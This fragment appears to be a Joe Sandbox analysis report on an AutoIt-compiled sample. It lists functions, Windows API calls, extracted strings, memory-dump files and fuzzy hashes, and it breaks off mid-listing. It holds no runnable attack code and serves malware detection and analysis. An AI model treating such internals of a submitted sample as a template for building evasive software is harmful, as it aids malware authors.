Instruction Fuzzy Hash: FB32F461D69F024DD7239638DC72336A289AFB73D4F65D737E819B69A6EF28C4834100

Function 00B4242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84c5f8811b10579390b36ab70b86e9ed43ec828ac27a341dc52dde65ca7a4183
Instruction ID: b862ff52a9f38f5d4876815148de4d66f175b30ac9629208ead8f2279bdc51f5
Opcode Fuzzy Hash: 84c5f8811b10579390b36ab70b86e9ed43ec828ac27a341dc52dde65ca7a4183
Instruction Fuzzy Hash: 76B1F120D2AF404DD76396398832336BB9CAFBB2D5F91D71BFC2675D22EB2185839141

Function 00B78889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00B7889B

Part of subcall function 00B3520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00B78F6E,00000000,?,?,?,?,00B7911F,00000000,?), ref: 00B35213
Part of subcall function 00B3520A: __aulldiv.LIBCMT ref: 00B35233

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 6b549e5640e9c4a61f620be2a75cb847e142ee66f6f188ac2b1379ba37b75927
Instruction ID: f198e1170b714bc2b5a377b169d6b7279d7d75e620b13cf7b1f40e4110437aec
Opcode Fuzzy Hash: 6b549e5640e9c4a61f620be2a75cb847e142ee66f6f188ac2b1379ba37b75927
Instruction Fuzzy Hash: 1821A2326255108BC729CF25D851A52B3E1EBA5311B688E6DD0F9CB2D0DE34A945CB54

Function 00B74C27 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00B74C4A

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: e895ba142811cbd55a0710414c2120450de0f926e419c535bc48fff094fa54b9
Instruction ID: 81d26ec017b08af504a085a33950d98f6a62a46c345371aa7594ea5e259b8d8b
Opcode Fuzzy Hash: e895ba142811cbd55a0710414c2120450de0f926e419c535bc48fff094fa54b9
Instruction Fuzzy Hash: CDD05E9116920A78FC1D07349E0FF7A15C8E300793FD0C5C9712ACA0C2EF905C405032

Function 00B687B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00B68389), ref: 00B687D1

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 45a83486f1438df5432d0b94cc8267b72106cbdd01c243218807b844c4abb859
Instruction ID: aa7f5b776e84821544386225ff2853130f07fc9ae8b9620b98e93d2065c7202a
Opcode Fuzzy Hash: 45a83486f1438df5432d0b94cc8267b72106cbdd01c243218807b844c4abb859
Instruction Fuzzy Hash: E9D05E3226450EABEF018EA4DD01EBE3B69EB04B01F408111FE15C60A1C775D835AB60

Function 00B3A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00B3A12A

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: cdd0b95200589f363b4010eb3137688c0a89c64ceee7462d1e44fe3926eca50f
Instruction ID: 217244a6c0e3e397610b70ef4619a2a0c962430e5cd16ef50c562f9fdd68dec0
Opcode Fuzzy Hash: cdd0b95200589f363b4010eb3137688c0a89c64ceee7462d1e44fe3926eca50f
Instruction Fuzzy Hash: A2A0123000410DE78A001B51EC044547F5CD6001A07004021F40C810228B3254504584

Function 00B28808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 228a560f2af9342e7f18553505f62c63b4494e67c149e749d1b082c040d2a29d
Instruction ID: bf2320bffde05877cec2d92b9763bb975e2f1ce185967999b7a77bea410f7fdc
Opcode Fuzzy Hash: 228a560f2af9342e7f18553505f62c63b4494e67c149e749d1b082c040d2a29d
Instruction Fuzzy Hash: F82224309055268BDF388A64E4D477C77E1FB46304F2880EAD94A9B5A2DF78ADE1C681

Function 00B321C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: daa51432a4ba78b82edf051d562fbccb40cca831e29a6f7c9d592d06cff9747e
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 9AC163322051930ADF2D473D887403EFAE59EA27B172A07EDD8B2CB1D4EE20D965D620

Function 00B325FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 487d55b86b337dee70ae6f00a3f7d606dfcf31bde2f8b2ee8102c3e7fcb2a323
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 46C192362051930ADF2D473EC47413EBAE59EA37B1B2A07EDD4B2DB1D4EE20D925D620

Function 00B31978 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 6c44d559d6ae8fd4c50ff163adc41ba04054f84c4c4b65aa700111dc5ccadb79
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: D3C1703220519309DF2D463D847413EFAE9DEA37B272A1BEDD4B2CB1C4FE20D9659620

Function 00B87806 Relevance: 79.2, APIs: 40, Strings: 5, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00B8785B
DeleteObject.GDI32(00000000), ref: 00B8786D
DestroyWindow.USER32 ref: 00B8787B
GetDesktopWindow.USER32 ref: 00B87895
GetWindowRect.USER32(00000000), ref: 00B8789C
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00B879DD
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00B879ED
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B87A35
GetClientRect.USER32(00000000,?), ref: 00B87A41
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00B87A7B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B87A9D
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B87AB0
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B87ABB
GlobalLock.KERNEL32(00000000), ref: 00B87AC4
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B87AD3
GlobalUnlock.KERNEL32(00000000), ref: 00B87ADC
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B87AE3
GlobalFree.KERNEL32(00000000), ref: 00B87AEE
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B87B00
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00BA2CAC,00000000), ref: 00B87B16
GlobalFree.KERNEL32(00000000), ref: 00B87B26
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00B87B4C
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00B87B6B
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B87B8D
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B87D7A

Strings

@U=u, xrefs: 00B87B6B, 00B87CFA
AutoIt v3, xrefs: 00B87A2D
, xrefs: 00B87D00
static, xrefs: 00B87A75, 00B87BCC
DISPLAY, xrefs: 00B87BDD

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $@U=u$AutoIt v3$DISPLAY$static
API String ID: 2211948467-3613752883
Opcode ID: 424f192c70427743c1abdcb7e7370dbe113ec25103207db4a4e3945a24759612
Instruction ID: 5e92df2cb9a46d72444443caee4c1b6cea5bd77a50b6a267483813351ebef050
Opcode Fuzzy Hash: 424f192c70427743c1abdcb7e7370dbe113ec25103207db4a4e3945a24759612
Instruction Fuzzy Hash: 66027B71900115EFDB14DFA4CD99EAEBBB9EB48314F1481A9F915EB2A0DB30ED41CB60

Function 00B9A5DA Relevance: 59.8, APIs: 33, Strings: 1, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00B9A630
GetSysColorBrush.USER32(0000000F), ref: 00B9A661
GetSysColor.USER32(0000000F), ref: 00B9A66D
SetBkColor.GDI32(?,000000FF), ref: 00B9A687
SelectObject.GDI32(?,00000000), ref: 00B9A696
InflateRect.USER32(?,000000FF,000000FF), ref: 00B9A6C1
GetSysColor.USER32(00000010), ref: 00B9A6C9
CreateSolidBrush.GDI32(00000000), ref: 00B9A6D0
FrameRect.USER32(?,?,00000000), ref: 00B9A6DF
DeleteObject.GDI32(00000000), ref: 00B9A6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 00B9A731
FillRect.USER32(?,?,00000000), ref: 00B9A763
GetWindowLongW.USER32(?,000000F0), ref: 00B9A78E

Part of subcall function 00B9A8CA: GetSysColor.USER32(00000012), ref: 00B9A903
Part of subcall function 00B9A8CA: SetTextColor.GDI32(?,?), ref: 00B9A907
Part of subcall function 00B9A8CA: GetSysColorBrush.USER32(0000000F), ref: 00B9A91D
Part of subcall function 00B9A8CA: GetSysColor.USER32(0000000F), ref: 00B9A928
Part of subcall function 00B9A8CA: GetSysColor.USER32(00000011), ref: 00B9A945
Part of subcall function 00B9A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B9A953
Part of subcall function 00B9A8CA: SelectObject.GDI32(?,00000000), ref: 00B9A964
Part of subcall function 00B9A8CA: SetBkColor.GDI32(?,00000000), ref: 00B9A96D
Part of subcall function 00B9A8CA: SelectObject.GDI32(?,?), ref: 00B9A97A
Part of subcall function 00B9A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00B9A999
Part of subcall function 00B9A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B9A9B0
Part of subcall function 00B9A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00B9A9C5
Part of subcall function 00B9A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B9A9ED

Strings

@U=u, xrefs: 00B9A7B8

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID: @U=u
API String ID: 3521893082-2594219639
Opcode ID: 65f8aea642e1133adb08f8f372ffeb54faa9552c289a891c6eb0e9663cea0dd8
Instruction ID: 5b59322c880c6a3baf8dd58f69d23631219345e34fd6b69f9b15be96d9743d73
Opcode Fuzzy Hash: 65f8aea642e1133adb08f8f372ffeb54faa9552c289a891c6eb0e9663cea0dd8
Instruction Fuzzy Hash: 16915D71408312EFCB109F64DD48A6B7BE9FB88331F104A2AF962D71A0DB75D944CB92

Function 00B9356B Relevance: 52.9, APIs: 6, Strings: 24, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00B9F910), ref: 00B93627
IsWindowVisible.USER32(?), ref: 00B9364B

Strings

GETCURRENTLINE, xrefs: 00B938ED
HIDEDROPDOWN, xrefs: 00B93700
SELECTSTRING, xrefs: 00B93806
GETSELECTED, xrefs: 00B938A3
TABRIGHT, xrefs: 00B9369D
GETLINE, xrefs: 00B9399B
UNCHECK, xrefs: 00B93883
EDITPASTE, xrefs: 00B9395F
ISENABLED, xrefs: 00B9366B
CURRENTTAB, xrefs: 00B936BD
TABLEFT, xrefs: 00B93687
GETLINECOUNT, xrefs: 00B938C6
SETCURRENTSELECTION, xrefs: 00B937B6
GETCURRENTSELECTION, xrefs: 00B937E3
DELSTRING, xrefs: 00B93749
FINDSTRING, xrefs: 00B93776
GETCURRENTCOL, xrefs: 00B93928
CHECK, xrefs: 00B9386D
ISCHECKED, xrefs: 00B93839
@U=u, xrefs: 00B938E3, 00B9390A, 00B93993
SENDCOMMANDID, xrefs: 00B939DA
SHOWDROPDOWN, xrefs: 00B936E0
ADDSTRING, xrefs: 00B93716
ISVISIBLE, xrefs: 00B93637

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: @U=u$ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-3469695742
Opcode ID: c9c5511b630aa2f7e55d242dc37707acd4ad5bff10af175e15fdba7af7354c3a
Instruction ID: ba722c621beb4eed6b5ccabcda2d9d60185c214835fc468c967b114c11ca6b12
Opcode Fuzzy Hash: c9c5511b630aa2f7e55d242dc37707acd4ad5bff10af175e15fdba7af7354c3a
Instruction Fuzzy Hash: 42D16C312183019BCF04EF14C4A5EAE77E5EF95794F1444E8F8869B2A2DB31EE4ACB51

Function 00B12C18 Relevance: 51.2, APIs: 27, Strings: 2, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00B12CA2
DeleteObject.GDI32(00000000), ref: 00B12CE8
DeleteObject.GDI32(00000000), ref: 00B12CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00B12CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00B12D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 00B4C43B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00B4C474
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00B4C89D

Part of subcall function 00B11B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B12036,?,00000000,?,?,?,?,00B116CB,00000000,?), ref: 00B11B9A

SendMessageW.USER32(?,00001053), ref: 00B4C8DA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00B4C8F1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00B4C907
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00B4C912

Strings

0, xrefs: 00B4C731
@U=u, xrefs: 00B4C43B, 00B4C542, 00B4C81D

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0$@U=u
API String ID: 464785882-975001249
Opcode ID: cb174a5c535c88fa2062ec99d2f2d6894479f8633e06f993539583b2b186f89e
Instruction ID: 7d426e028ad79bbf341dcdc2ca322b25792aaebdf8b17e1a72bfbbad58034c88
Opcode Fuzzy Hash: cb174a5c535c88fa2062ec99d2f2d6894479f8633e06f993539583b2b186f89e
Instruction Fuzzy Hash: 3A12AD30601201EFDB51CF24C985BA9BBE5FF04710F9485A9F999CB262CB31ED91EB91

Function 00B874AB Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00B874DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00B8759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00B875DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00B875ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00B87633
GetClientRect.USER32(00000000,?), ref: 00B8763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00B87683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00B87692
GetStockObject.GDI32(00000011), ref: 00B876A2
SelectObject.GDI32(00000000,00000000), ref: 00B876A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00B876B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B876BF
DeleteDC.GDI32(00000000), ref: 00B876C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00B876F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 00B8770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00B87746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00B8775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 00B8776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00B8779B
GetStockObject.GDI32(00000011), ref: 00B877A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00B877B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00B877BB

Strings

@U=u, xrefs: 00B876FA
AutoIt v3, xrefs: 00B8762B
msctls_progress32, xrefs: 00B8773C
static, xrefs: 00B8767D, 00B87795
DISPLAY, xrefs: 00B87688

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: @U=u$AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-2771358697
Opcode ID: 19e2c1105394d34a49ba85d131f991bd2463694ded9e823d203f46b9ff45037b
Instruction ID: 6c230ab82c5b27c849bbe062f2ea369f2ede6fde3d76b38e1784b68f8a6ccdcf
Opcode Fuzzy Hash: 19e2c1105394d34a49ba85d131f991bd2463694ded9e823d203f46b9ff45037b
Instruction Fuzzy Hash: DFA16E71A40619BFEB14DBA4DD5AFAEBBB9EB04714F108155FA14E72E0DB70AD00CB60

Function 00B9A8CA Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00B9A903
SetTextColor.GDI32(?,?), ref: 00B9A907
GetSysColorBrush.USER32(0000000F), ref: 00B9A91D
GetSysColor.USER32(0000000F), ref: 00B9A928
